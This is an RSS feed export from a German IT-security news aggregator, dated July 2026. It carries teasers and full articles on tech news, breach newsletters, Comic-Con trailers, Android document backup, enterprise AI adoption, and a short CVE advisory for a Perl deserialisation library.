<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=perl+weekly+perl+v5435%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Mon, 27 Jul 2026 18:47:29 +0200</lastBuildDate>
<pubDate>Mon, 27 Jul 2026 18:47:29 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=perl+weekly+perl+v5435%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=perl+weekly+perl+v5435%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[The vertical video takeover is here]]></title>
<description><![CDATA[This is The Stepback, a weekly newsletter breaking down one essential story from the tech world. For more on all things vertical video, follow David Pierce. The Stepback arrives in our subscribers' inboxes on Sunday at 8AM ET. Opt in for The Stepback here. How it started For a while, every social...]]></description>
<link>https://tsecurity.de/de/3695632/it-nachrichten/the-vertical-video-takeover-is-here/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695632/it-nachrichten/the-vertical-video-takeover-is-here/</guid>
<pubDate>Sun, 26 Jul 2026 14:30:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This is The Stepback, a weekly newsletter breaking down one essential story from the tech world. For more on all things vertical video, follow David Pierce. The Stepback arrives in our subscribers' inboxes on Sunday at 8AM ET. Opt in for The Stepback here. How it started For a while, every social and media platform […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Security Affairs newsletter Round 587 by Pierluigi Paganini – INTERNATIONAL EDITION]]></title>
<description><![CDATA[A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Iran-Linked Actors Breach Are Targeting US Wat...]]></description>
<link>https://tsecurity.de/de/3695596/hacking/security-affairs-newsletter-round-587-by-pierluigi-paganini-international-edition/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695596/hacking/security-affairs-newsletter-round-587-by-pierluigi-paganini-international-edition/</guid>
<pubDate>Sun, 26 Jul 2026 14:03:38 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Iran-Linked Actors Breach Are Targeting US Water and Energy Control Systems Australian energy provider Origin Energy […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Security Affairs newsletter Round 587 by Pierluigi Paganini – INTERNATIONAL EDITION]]></title>
<description><![CDATA[A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Iran-Linked Actors Breach Are Targeting US Wat...]]></description>
<link>https://tsecurity.de/de/3695595/it-security-nachrichten/security-affairs-newsletter-round-587-by-pierluigi-paganini-international-edition/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695595/it-security-nachrichten/security-affairs-newsletter-round-587-by-pierluigi-paganini-international-edition/</guid>
<pubDate>Sun, 26 Jul 2026 14:03:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Iran-Linked Actors Breach Are Targeting US Water and Energy Control Systems Australian energy provider Origin Energy […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Weekly Update 514: This Week in Data Breaches]]></title>
<description><![CDATA[The Origin Energy breach down here in Aus is all over the news this week, and as with many breaches, it's multi-faceted. You've got them leading with "don't worry, your credit card is fine", the hacker leading with "they didn&]]></description>
<link>https://tsecurity.de/de/3695417/it-security-nachrichten/weekly-update-514-this-week-in-data-breaches/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695417/it-security-nachrichten/weekly-update-514-this-week-in-data-breaches/</guid>
<pubDate>Sun, 26 Jul 2026 11:16:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Origin Energy breach down here in Aus is all over the news this week, and as with many breaches, it's multi-faceted. You've got them leading with "don't worry, your credit card is fine", the hacker leading with "they didn&amp;</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Comic-Con 2026 Debuts Trailers for 'Coyote vs Acme' Movie, Plus 'Neuromancer' and 'Blade Runner 2099' Series]]></title>
<description><![CDATA[Big news from Comic-Con 2026:

"Coyote vs. ACME" debuted its long-awaited final trailer. CNET calls it "an animation-meets-live-action story," with the Coyote catapulting into theaters this August 28. (The film began development back in 2018, but was shelved for a tax write-off in 2023 by Warner ...]]></description>
<link>https://tsecurity.de/de/3695323/it-security-nachrichten/comic-con-2026-debuts-trailers-for-coyote-vs-acme-movie-plus-neuromancer-and-blade-runner-2099-series/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695323/it-security-nachrichten/comic-con-2026-debuts-trailers-for-coyote-vs-acme-movie-plus-neuromancer-and-blade-runner-2099-series/</guid>
<pubDate>Sun, 26 Jul 2026 10:01:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Big news from Comic-Con 2026:

"Coyote vs. ACME" debuted its long-awaited final trailer. CNET calls it "an animation-meets-live-action story," with the Coyote catapulting into theaters this August 28. (The film began development back in 2018, but was shelved for a tax write-off in 2023 by Warner Bros. until a backlash led to its sale to Ketchup Entertainment.) "Fed up with Acme's unreliable products, Wile E. Coyote decides to hire a lawyer and sue the company..." writes CNET. "The movie also features Lana Condor along with a host of Looney Tunes characters like Porky Pig, Tweety, Foghorn Leghorn and Granny (who gets dinged by an anvil)."
In other movie news, CNET says Johnny Depp also "made a surprise appearance at Comic-Con, donning a costume as Ebenezer Scrooge" to promote his November 13 movie about the miser from Charles Dickens' famous Christmas novella. (Ian McKellen and Daisy Ridley are also in the movie.)


But several geek favorites are being filmed as TV series...

 There's big news for William Gibson fans, reports Entertainment Weekly. "Two years after Apple TV announced production on the first-ever series adaptation of William Gibson's seminal 1984 novel Neuromancer, the lucky few hundred who attended the studio's Hall H panel at Comic-Con 2026 got to watch the first teaser. 

For Amazon's Prime Video, the Tolkien-derived "Rings of Power" series released a season 3 trailer that CNET said "successfully hides the best parts with fire... The trailer suggests that Sauron is building an army, and all of Middle-earth is trying to find ways to stop him... Rings of Power season 3 will start dropping weekly episodes on Nov. 11, meaning this show will be airing at the same time the Peter Jackson films will be celebrating their 25th anniversary."
Later in November Amazon's Prime Video will also debut Blade Runner 2099, an eight-episode series that's a sequel to 2017's film Blade Runner 2049, reports CNET. "Set in an alternate version of LA where replicants run things and the humans play second fiddle, the series sees Yeoh's replicant Olwen chasing down outlaw replicants who've gone missing. With her own shelf life on a ticking clock, the stakes are high for her and for her human fugitive partner, Cora..."
Paramount Plus will debut Avatar: Seven Havens in October, a new animated series from the creators of Avatar: The Last Airbender which CNET says "follows a pair of twin avatars, one of whom is Korra's successor."

Disney+ has season 3 of Percy Jackson and the Olympians.
Kevin Feige said Marvel's television slate will include more seasons of "X-Men '97" and the upcoming "VisionQuest" TV series.
HBO Max will launch a new Green Lantern series called Lanterns on August 16.
<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Comic-Con+2026+Debuts+Trailers+for+'Coyote+vs+Acme'+Movie%2C+Plus+'Neuromancer'+and+'Blade+Runner+2099'+Series%3A+https%3A%2F%2Fentertainment.slashdot.org%2Fstory%2F26%2F07%2F26%2F038200%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fentertainment.slashdot.org%2Fstory%2F26%2F07%2F26%2F038200%2Fcomic-con-2026-debuts-trailers-for-coyote-vs-acme-movie-plus-neuromancer-and-blade-runner-2099-series%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://entertainment.slashdot.org/story/26/07/26/038200/comic-con-2026-debuts-trailers-for-coyote-vs-acme-movie-plus-neuromancer-and-blade-runner-2099-series?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die Cyberangriffe der KW30/2026 im Überblick - Computer Weekly]]></title>
<description><![CDATA[Der Angriff umfasste auch einen Versuch, die Systeme zu verschlüsseln, der dank der internen Cybersicherheitskontrollen von Ecopetrol blockiert wurde.]]></description>
<link>https://tsecurity.de/de/3694852/it-security-nachrichten/die-cyberangriffe-der-kw302026-im-ueberblick-computer-weekly/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694852/it-security-nachrichten/die-cyberangriffe-der-kw302026-im-ueberblick-computer-weekly/</guid>
<pubDate>Sat, 25 Jul 2026 20:46:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der Angriff umfasste auch einen Versuch, die Systeme zu verschlüsseln, der dank der internen Cybersicherheitskontrollen von Ecopetrol blockiert wurde.]]></content:encoded>
</item>
<item>
<title><![CDATA[Your instant Android backup upgrade]]></title>
<description><![CDATA[Here in this high-tech era of 2026, keeping important info backed up and synced should be effortless and something that just happens on its own, automatically, without any actual thought or ongoing human effort.



In many areas of our digital life, that mercifully does Just Work™ in exactly that...]]></description>
<link>https://tsecurity.de/de/3694774/ai-nachrichten/your-instant-android-backup-upgrade/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694774/ai-nachrichten/your-instant-android-backup-upgrade/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:10 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Here in this high-tech era of 2026, keeping important info backed up and synced <em>should </em>be effortless and something that just happens on its own, automatically, without any actual thought or ongoing human effort.</p>



<p class="wp-block-paragraph">In many areas of our digital life, that mercifully does Just Work™ in exactly that way. Fire up an email in most modern mail services, and you can stop at any point and find your in-progress draft in that same app on any other device. The same applies to any file you’re finessing within Google Drive or other cloud storage services or document you’re dawdling over in Docs.</p>



<p class="wp-block-paragraph">One area where seamless syncing somehow still <em>doesn’t</em> occur, though, is in the domain of <em>downloaded </em>documents on Android. If someone sends you a PDF or a Word file and you save it to your phone, that file exists in an archaic-seeming silo — only locally, on <em>that</em> one gadget. And that, of course, means (a) you can’t access it from any other device, and (b) if you misplace your phone or move into a new one at some point along the way, the file will be left behind in time and entirely unavailable.</p>



<p class="wp-block-paragraph">Well, take a moment to join me in celebration: Amidst all the <a href="https://www.computerworld.com/article/4136922/google-gemini-3-years.html">Gemini gobbledegook</a> that <a href="https://www.computerworld.com/article/2117752/google-gemini-ai.html">no one asked for</a> (and that often falls somewhere between <a href="https://www.computerworld.com/article/4182583/ai-creepy-era.html">“pointless”</a> and <a href="https://www.computerworld.com/article/3990497/google-gemini-deceit.html">“actively counterproductive”</a>), Google’s giving us a major upgrade to Android’s backup capabilities right now. It’s a simple-seeming switch buried in your system settings, and it’s up to <em>you</em> to find and activate it.</p>



<p class="wp-block-paragraph">Once you do, though, those once-orphaned documents on your Android device’s local storage will be perpetually synced and protected, automatically, without any ongoing thought or effort.</p>



<p class="wp-block-paragraph">All <em>you’ve </em>gotta do is find and flip that one new switch.</p>



<p class="wp-block-paragraph"><strong>[Don’t let yourself miss an ounce of Android Intelligence. </strong><a href="https://www.theintelligence.com/android-cw/" target="_blank" rel="noreferrer noopener"><strong>Join my free weekly Android Intelligence newsletter</strong></a><strong> and get one new thing to try in your inbox every Friday!]</strong></p>



<h2 class="wp-block-heading"><strong>The Android backup lowdown</strong></h2>



<p class="wp-block-paragraph">So, for a quick bit of pertinent context on this: Android’s backup systems have actually come a really long way over the years.</p>



<p class="wp-block-paragraph">‘Twas a time, y’see, when little to nothing about you would sync and carry over automatically from one Android device to another. Years ago — back in the ancient-seeming prehistoric era of the early 2010s — Android enthusiasts in the know would rely on community-created third-party apps for everything from remembering and resyncing downloaded apps to restoring data from within those apps and onward. And reconfiguring your system preferences would be a whole time-consuming song and dance every single time you reset a device or moved into a new one, as little to nothing would automatically carry over.</p>



<p class="wp-block-paragraph">Most of that stuff is now effortless and automatic. And, thanks to apps like Google Messages, Calendar, Drive, and Docs, many <em>other </em>areas of important data are also synced on their own at the app level — outside of any system mechanisms.</p>



<p class="wp-block-paragraph">Locally stored files, however, have remained an awkward omission. To this day, anything you download on any Android device exists only on <em>that</em> <em>one device </em>and isn’t synced or backed up anywhere. The only way that happens is — in a blast-from-the-past twist — if <em>you </em>go out of your way to <a href="https://www.computerworld.com/article/1711741/how-to-back-up-android-phones-complete-guide.html#:~:text=a%20new%20one.-,Files,-The%20easiest%20way">find and set up a third-party app to handle the heavy lifting</a>.</p>



<p class="wp-block-paragraph">That brings us to today. Right now, as we speak, Google’s in the midst of sending out a quiet under-the-hood update that (brace yourself…) adds in the option to automatically sync and back up any documents on your device as a native part of Android’s backup setup.</p>



<p class="wp-block-paragraph">See?</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/android-backup-documents.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Android backup documents" class="wp-image-4198961" width="1024" height="546" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">The easily overlooked new option for backing up documents on Android.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p class="wp-block-paragraph">The option is on its way to all devices running 2018’s <a href="https://www.computerworld.com/article/1698598/android-9-pie.html">Android 9 release</a> and higher. (If you’re still using a phone with an <a href="https://www.computerworld.com/article/1714347/android-versions-a-living-history-from-1-0-to-today.html">Android version</a> older than that, you’re now a whopping <em>eight years </em>out of date, and you have <a href="https://www.computerworld.com/article/1718016/android-upgrades-matter.html"><em>much</em> bigger problems</a>.)</p>



<p class="wp-block-paragraph">Once the added option is present and available for you, you’re literally lookin’ at 10 seconds to find and activate it.</p>



<p class="wp-block-paragraph">Lemme show ya how.</p>



<h2 class="wp-block-heading"><strong>Android’s document backup addition</strong></h2>



<p class="wp-block-paragraph">I promise: This couldn’t be much simpler.</p>



<p class="wp-block-paragraph">No matter what kind of Android device is in front of you, just head into your system settings and open the section called “Accounts and backup,” “Back up or copy data,” or something along those same lines. (The exact wording can vary based on who made your device and when it was released or last updated.)</p>



<p class="wp-block-paragraph">Either tap the line labeled “Google Backup” or look for an option to “Back up data” via Google Drive. You should then either see a series of options for different areas of available backup right then and there — or, depending on your device, you might have to tap a line labeled “Other device data” (or something similar) to find the full list of possibilities.</p>



<p class="wp-block-paragraph">However you get there, once you’re lookin’ at that list, you’ll see a newly added line for “Documents” if this latest under-the-hood update has reached you.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/android-backup-options.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Android backup options" class="wp-image-4198962" width="1024" height="742" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Android’s expanded list of backup options — now including documents alongside other forms of on-device data.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p class="wp-block-paragraph">And from there, all that’s left is to tap it and enable the switch to include that in your automated backups from that moment forward.</p>



<p class="wp-block-paragraph">If you aren’t seeing the option yet, don’t panic. Google always sends these under-the-hood updates out bit by bit over time, so the change probably just hasn’t reached your device quite yet. As long as you’re running Android 9 or higher, it’ll get there. Set yourself a reminder to check back once a week or so. Odds are, you’ll see it pretty soon.</p>



<p class="wp-block-paragraph">Notably, all documents synced in this way are always encrypted for security, and they’re kept in your personal (or, depending on the nature of your account, perhaps company-connected) Google Drive storage. That <em>does</em> mean they’ll count against your overall Google storage total, so keep an eye on your <a href="https://drive.google.com/drive/u/0/quota" target="_blank" rel="noreferrer noopener">Drive storage total</a> to make sure you’re in solid shape and look to the <a href="https://one.google.com/storage/management?from=1&amp;g1_landing_page=1" target="_blank" rel="noreferrer noopener">Google One storage hub</a> if you ever want some simple suggestions for freeing up space.</p>



<p class="wp-block-paragraph">Speaking of other Google services: If you ever want to keep <em>other</em> types of locally stored <em>non</em>-document files from an Android device synced and available elsewhere, you can easily rely on <a href="https://www.computerworld.com/article/1711741/how-to-back-up-android-phones-complete-guide.html#:~:text=in-app%20upgrade.-,Photos%20and%20music,-OK%2C%20so%20they">Google Photos for syncing screenshots and other images</a> — after enabling sync in general, be sure to look in the app’s “Collections” areas to find the “On this device” folder and then flip the toggle to “Backup all device folders” (or get more nuanced and open specific <em>individual </em>on-device folders if you want to sync some but not all of those areas) — and you can still turn to <a href="https://www.computerworld.com/article/1711741/how-to-back-up-android-phones-complete-guide.html#:~:text=a%20new%20one.-,Files,-The%20easiest%20way">those aforementioned third-party apps</a> for broader syncing of anything else imaginable.</p>



<p class="wp-block-paragraph">But with documents now being handled automatically and natively, that’s one big worry now out of your hair. Just note that the onus will fall on <em>you </em>to find and flip the switch and actively opt in to the feature on each and every Android device you’re using.</p>



<p class="wp-block-paragraph">Take 10 seconds to do that, though, and you’ll have one less void in your Android data arena. And you don’t need Gemini to tell you that <em>that </em>can only be a good thing.</p>



<p class="wp-block-paragraph"><em>Get practical Android knowledge in your inbox every Friday with </em><a href="https://www.theintelligence.com/android-cw/" target="_blank" rel="noreferrer noopener"><strong><em>my free Android Intelligence newsletter</em></strong></a><strong><em> </em></strong><em>— one new thing to try each week, straight from me to you.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[KDnuggets Weekly Roundup: Week of July 20, 2026]]></title>
<description><![CDATA[Top 5 MCP Servers for High Performance Agentic Development • 10 Newsletters Keeping You Ahead in AI • Kaggle + Google’s Free 5-Day Agentic AI Course • Language Model Hallucination Evaluation with GraphEval]]></description>
<link>https://tsecurity.de/de/3694721/ai-nachrichten/kdnuggets-weekly-roundup-week-of-july-20-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694721/ai-nachrichten/kdnuggets-weekly-roundup-week-of-july-20-2026/</guid>
<pubDate>Sat, 25 Jul 2026 19:49:38 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Top 5 MCP Servers for High Performance Agentic Development • 10 Newsletters Keeping You Ahead in AI • Kaggle + Google’s Free 5-Day Agentic AI Course • Language Model Hallucination Evaluation with GraphEval]]></content:encoded>
</item>
<item>
<title><![CDATA[Why I changed how I pitch AI: It’s no longer about saving money, but managing tokens and adoption]]></title>
<description><![CDATA[I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.



The initial hype has ...]]></description>
<link>https://tsecurity.de/de/3694390/it-security-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694390/it-security-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.</p>



<p class="wp-block-paragraph">The initial hype has faded, leaving CIOs to drive real enterprise value. Based on my experience implementing Google, OpenAI and Anthropic technologies, here are the fundamental, technology-agnostic lessons every leader must anchor their strategy around.</p>



<h2 class="wp-block-heading"><a></a>AI as a leadership multiplier</h2>



<p class="wp-block-paragraph">The most common tactical error we see is treating AI as an isolated technology project. What I have observed among our customers is that true success does not come from organizations that define a standalone “AI strategy,” but rather from those leaders that integrate AI into their business strategy.</p>



<p class="wp-block-paragraph">When our customers isolate AI and define an AI strategy, it inevitably treats it like a “technological toy” to experiment with. This approach yields fragmented, orphaned initiatives that fail to scale because they are fundamentally disconnected from their core corporate objectives. What I learned is that AI is not the ultimate destination; it is a powerful catalyst. We have replaced “What can AI do for our customers?” with a more strategic question, “How does AI accelerate their existing business goals?”</p>



<p class="wp-block-paragraph">Think of AI like electricity. No modern corporation designs a standalone “electricity strategy.” Instead, all companies route it invisibly across the entire organization to illuminate offices, power production lines and drive communication. AI must be woven into the enterprise fabric in the exact same way, acting as an underlying utility that supercharges your existing operational model.</p>



<p class="wp-block-paragraph">Integrating AI into the broader business strategy also dictates how we measure success. It forces a shift away from short-term tech vanity metrics and anchors the technology into a long-term roadmap.</p>



<p class="wp-block-paragraph">When AI remains trapped within the IT department of our customers, we notice that it is relegated to a mere “software experiment.” To become a true competitive advantage, we observed that AI requires intense cross-functional orchestration. This perspective does not diminish the merit of the technical team; their expertise is fundamental for establishing the architecture, data governance and tools your enterprise requires. However, while IT builds the foundational infrastructure, it lacks the organizational authority to decide what should be built on top of it. Only the CEO or the owner of the company can step in to ensure AI leaves the “toy project” phase and integrates into the DNA of the organization.</p>



<p class="wp-block-paragraph">The requirement for top-down, executive ownership stems from three critical realities observed in the field:</p>



<ul class="wp-block-list">
<li><strong>Silo-smashing and data collaboration:</strong> True enterprise AI is data-hungry and that data lives across disparate business lines, finance, operations, marketing and customer service. Only the CEO possesses the cross-functional authority to demand that data silos be dismantled.</li>



<li><strong>Cultural transformation and fear mitigation:</strong> AI triggers widespread anxiety over job displacement across all industries and hierarchies. When relegated to an “IT project,” resistance spikes as teams view it as a threat to their livelihoods. When I saw the CEO lead this cultural shift directly is when I noticed the best results.</li>



<li><strong>C-Suite education and strategic alignment:</strong> The mandate for AI capability cannot just be delegated downward; the transformation must begin at the very top. I have conducted more than 70 presentations for the Board of Directors and C-Level teams. These people need to be actively educated not on technical code, but on specific business use cases, return on investment (ROI) frameworks and how AI resolves core organizational bottlenecks.</li>
</ul>



<p class="wp-block-paragraph"><a href="https://www.pwc.com/gx/en/issues/c-suite-insights/ceo-survey.html">PwC’s data found that only 12% of enterprises have achieved both cost and revenue benefits from AI</a>. Those elite 12% succeeded precisely because their CEOs embedded AI extensively across <em>strategic decision-making and cross-functional workflows</em>. AI is simply too disruptive and too critical to be left exclusively in the hands of technical experts. If AI is not on the CEO’s weekly agenda, it is fundamentally missing from the company’s true strategy.</p>



<h2 class="wp-block-heading"><a></a>AI as a new operational framework</h2>



<p class="wp-block-paragraph">Traditional IT systems have operated on strict algorithmic certainty: if you input a specific set of data, the system executes an immutable line of code and guarantees the same, predictable output every single time.</p>



<p class="wp-block-paragraph">AI completely breaks this paradigm. Because modern AI is built on probabilistic models, it does not execute static formulas; instead, it predicts the most likely correct response based on mathematical probabilities. This means that AI solutions carry an inherent, small percentage of uncertainty and variability. A prompt entered today might yield a slightly different, though contextually valid, output tomorrow.</p>



<p class="wp-block-paragraph">Executive leadership and organizational cultures must be actively educated to accept and navigate this fundamental shift. Traditional quality assurance frameworks for software are designed for a 100% success rate. Applying this rigid standard to AI will paralyze your initiatives, keeping 80% of your projects trapped eternally in the pilot phase. This happened to us in a food and beverage company in Latin America a couple of years ago. After this experience, we started to include conditions in our contracts that tolerate statistical margins of error and still define the project as a success.</p>



<p class="wp-block-paragraph">In terms of cost calculation, we had to teach CIOs and business managers to forget the monthly subscription model for AI and learn to manage the primary unit of exchange in modern AI: the token.</p>



<p class="wp-block-paragraph">To understand AI costs, executives must understand how large language models process data. AI models do not read full words; instead, they break text, images or code down into “pieces” called tokens. As a baseline, every 100 words process as approximately 130 to 140 tokens. Because the major AI providers use the token as their currency, <a href="https://arxiv.org/pdf/2604.22750">your business is billed dynamically based on the exact volume of tokens consumed</a> by every query submitted (input) and every response generated (output).</p>



<p class="wp-block-paragraph">Many leaders believe AI costs are fixed due to flat-rate enterprise tiers ($25–$30/user). This is a temporary illusion. These venture-capital-subsidized rates mask true operational costs and come with dynamic usage limits. Modeling long-term ROI on them guarantees a severe budget shock when true consumption pricing takes over.</p>



<p class="wp-block-paragraph">The solution is not to halt AI adoption; doing so means losing your competitive edge. Instead, the cost per token must cease to be treated as a technical footnote relegated to the IT department. It must be elevated to a core business variable.</p>



<h2 class="wp-block-heading">Risks in the AI adoption model</h2>



<p class="wp-block-paragraph">Since the beginning of the AI boom, I have seen all our customers making a critical tactical error that could cost them heavily in the medium term: they are focusing only on operational efficiency (reducing costs with AI).</p>



<p class="wp-block-paragraph">I have observed that an alarmingly high percentage of companies remain trapped in pilot phases focused exclusively on short-term cost reduction. <a href="https://www.bain.com/insights/your-ai-budget-is-growing-your-returns-arent-heres-why/">Bain &amp; Company’s global Automation and AI Pathfinder Survey </a>found that the largest share of companies measuring their AI initiatives (exactly 40%) realized cost reductions of 10% or less, heavily missing their internal targets. Our customers are putting too many resources and effort into marginal financial gains and in doing so, they are jeopardizing their most valuable assets: service quality, resilience and customer trust.</p>



<p class="wp-block-paragraph">Utilizing AI solely to slash headcount or cut operational corners is a dangerous trap that introduces severe field liabilities. A financial service organization in Latin America announced that they saved $1 million in customer support by replacing humans with AI chatbots. However, the mid-term reality revealed a different story: a damaged brand reputation due to AI errors and an influx of frustrated clients fleeing because the automated system cannot handle special cases.</p>



<p class="wp-block-paragraph">Putting a company on an extreme AI diet might make it look leaner on next quarter’s financial statement, but over-indexing on cost-cutting will ultimately leave the business too weak to compete when market dynamics shift. We are now inviting our customers to change the question from <em>“How much money will AI save us?”</em> to <em>“How will we leverage AI to exponentially increase the long-term value of our enterprise?”</em></p>



<p class="wp-block-paragraph">Deploying enterprise AI is a marathon, not a sprint, and the terrain changes with every mile. The organizations that thrive in this next era will be those that transition from fascination to discipline, treating AI not as a magic bullet for immediate savings, but as a core capability that demands rigorous governance, architectural foresight and cultural maturity. Navigating this shift requires moving past the theoretical hype and anchoring decisions in raw, field-tested reality.</p>



<p class="wp-block-paragraph">As we continue to deploy these technologies across industries, the blueprint for success is being rewritten in real time. Let’s keep this conversation going as we map out the future of business intelligence together.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-14030 | YVES Sereal::Decoder up to 4.009_002 on Perl Compression vulnerable third-party component (GHSA-w77f-wv46-4vcx)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in YVES Sereal::Decoder up to 4.009_002 on Perl. This impacts the function Sereal::Decoder of the component Compression Handler. Performing a manipulation results in dependency on vulnerable third-party component.

This vulnerability was...]]></description>
<link>https://tsecurity.de/de/3693835/sicherheitsluecken/cve-2024-14030-yves-serealdecoder-up-to-4009002-on-perl-compression-vulnerable-third-party-component-ghsa-w77f-wv46-4vcx/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693835/sicherheitsluecken/cve-2024-14030-yves-serealdecoder-up-to-4009002-on-perl-compression-vulnerable-third-party-component-ghsa-w77f-wv46-4vcx/</guid>
<pubDate>Sat, 25 Jul 2026 13:12:42 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/yves:sereal_decoder">YVES Sereal::Decoder up to 4.009_002</a> on Perl. This impacts the function <code>Sereal::Decoder</code> of the component <em>Compression Handler</em>. Performing a manipulation results in dependency on vulnerable third-party component.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2024-14030">CVE-2024-14030</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
